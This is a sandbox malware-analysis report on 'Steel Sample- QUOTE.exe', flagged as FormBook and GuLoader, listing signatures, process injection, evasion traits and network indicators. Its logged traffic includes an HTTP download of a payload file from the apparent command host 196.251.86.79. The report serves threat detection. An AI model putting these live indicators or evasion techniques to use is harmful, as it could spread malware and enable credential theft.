Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Steel Sample- QUOTE.exe

Overview

General Information

Sample name:Steel Sample- QUOTE.exe
Analysis ID:1629363
MD5:1a0611d6fad6a80c0369a33c2e09f52a
SHA1:a66e801bc37c50f675fa9f98864caf292052900d
SHA256:1d9fbcb6a4f1688a020b56a5d82e29498f8b2c22c6e6c04bdf1ffcbfd80b65da
Tags:exeuser-lowmal3
Infos:

Detection

FormBook, GuLoader
Score:80
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Steel Sample- QUOTE.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)
    • Steel Sample- QUOTE.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\Steel Sample- QUOTE.exe" MD5: 1A0611D6FAD6A80C0369A33C2E09F52A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5576 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\6598NWeXn4d.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 4888 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\Go8zzyHYSzv.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5076 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\FFwqjpuGr.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • 4KXbBCJB2PUOofMF0XAGHYJ.exe (PID: 5628 cmdline: "C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\XkMQicXLAokJ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-04T16:54:15.595898+010028032702Potentially Bad Traffic192.168.2.463713196.251.86.7980TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Steel Sample- QUOTE.exeVirustotal: Detection: 23%Perma Link
            Source: Steel Sample- QUOTE.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Steel Sample- QUOTE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Binary string: mshtml.pdb source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: wntdll.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Steel Sample- QUOTE.exe, Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.000000003506A000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000353AE000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.0000000035210000.00000040.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034EBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2962917710.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2962988596.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000011.00000000.2753551476.00000000001AF000.00000002.00000001.01000000.00000008.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 00000012.00000000.2873144572.00000000001AF000.00000002.00000001.01000000.00000008.sdmp
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
            Source: global trafficTCP traffic: 192.168.2.4:63695 -> 162.159.36.2:53
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:63713 -> 196.251.86.79:80
            Source: global trafficHTTP traffic detected: GET /vHTwkXp255.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 196.251.86.79Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: unknownTCP traffic detected without corresponding DNS query: 196.251.86.79
            Source: global trafficHTTP traffic detected: GET /vHTwkXp255.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: 196.251.86.79Cache-Control: no-cache
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297486628.0000000005056000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518545441.0000000005054000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000003.2518463210.0000000005054000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/R
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3330181036.00000000346F0000.00000004.00001000.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmp, Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.bin
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.binr
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.binx
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3297422474.0000000005044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.86.79/vHTwkXp255.biny
            Source: Steel Sample- QUOTE.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Steel Sample- QUOTE.exe, 00000006.00000001.2207372084.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.2964847255.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352835C0 NtCreateMutant,LdrInitializeThunk,6_2_352835C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_35282DF0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_35282C70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35282B60 NtClose,LdrInitializeThunk,6_2_35282B60
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283010 NtOpenDirectoryObject,6_2_35283010
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283090 NtSetValueKey,6_2_35283090
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283D10 NtOpenProcessToken,6_2_35283D10
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35283D70 NtOpenThread,6_2_35283D70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352839B0 NtGetContextThread,6_2_352839B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35284650 NtSuspendThread,6_2_35284650
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,ExitProcess,0_2_00403358
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile created: C:\Windows\resources\Bementite.iniJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00404B0E0_2_00404B0E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040653D0_2_0040653D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353075716_2_35307571
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352ED5B06_2_352ED5B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353195C36_2_353195C3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530F43F6_2_3530F43F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352414606_2_35241460
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530F7B06_2_3530F7B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352956306_2_35295630
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353016CC6_2_353016CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3528516C6_2_3528516C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523F1726_2_3523F172
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531B16B6_2_3531B16B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525B1B06_2_3525B1B0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530F0E06_2_3530F0E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353070E96_2_353070E9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF0CC6_2_352FF0CC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352570C06_2_352570C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530132D6_2_3530132D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D34C6_2_3523D34C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3529739A6_2_3529739A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A06_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526D2F06_2_3526D2F0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C06_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35307D736_2_35307D73
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D406_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35301D5A6_2_35301D5A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526FDC06_2_3526FDC0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C9C326_2_352C9C32
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530FCF26_2_3530FCF2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530FF096_2_3530FF09
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530FFB16_2_3530FFB1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251F926_2_35251F92
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35213FD26_2_35213FD2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35213FD56_2_35213FD5
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35259EB06_2_35259EB0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E59106_2_352E5910
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352599506_2_35259950
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B9506_2_3526B950
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352BD8006_2_352BD800
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352538E06_2_352538E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530FB766_2_3530FB76
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526FB806_2_3526FB80
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3528DBF96_2_3528DBF9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C5BF06_2_352C5BF0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C3A6C6_2_352C3A6C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35307A466_2_35307A46
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530FA496_2_3530FA49
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EDAAC6_2_352EDAAC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35295AA06_2_35295AA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F1AA36_2_352F1AA3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FDAC66_2_352FDAC6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352505356_2_35250535
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353105916_2_35310591
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F44206_2_352F4420
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353024466_2_35302446
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FE4F66_2_352FE4F6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352507706_2_35250770
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352747506_2_35274750
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524C7C06_2_3524C7C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526C6E06_2_3526C6E0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352401006_2_35240100
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EA1186_2_352EA118
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D81586_2_352D8158
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353041A26_2_353041A2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353101AA6_2_353101AA
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 35297E54 appears 71 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 35285130 appears 44 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 3523B970 appears 188 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 352CF290 appears 42 times
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: String function: 352BEA12 appears 48 times
            Source: Steel Sample- QUOTE.exe, 00000006.00000002.3332139420.00000000354E1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2519869425.0000000035197000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exe, 00000006.00000003.2518236635.0000000034FE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Steel Sample- QUOTE.exe
            Source: Steel Sample- QUOTE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal80.troj.evad.winEXE@3/9@0/1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile created: C:\Users\user\AppData\Roaming\RigsantikvarernesJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile created: C:\Users\user\AppData\Local\Temp\nsr4243.tmpJump to behavior
            Source: Steel Sample- QUOTE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Steel Sample- QUOTE.exeVirustotal: Detection: 23%
            Source: Steel Sample- QUOTE.exeReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeFile read: C:\Users\user\Desktop\Steel Sample- QUOTE.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: version.dllJump to behavior
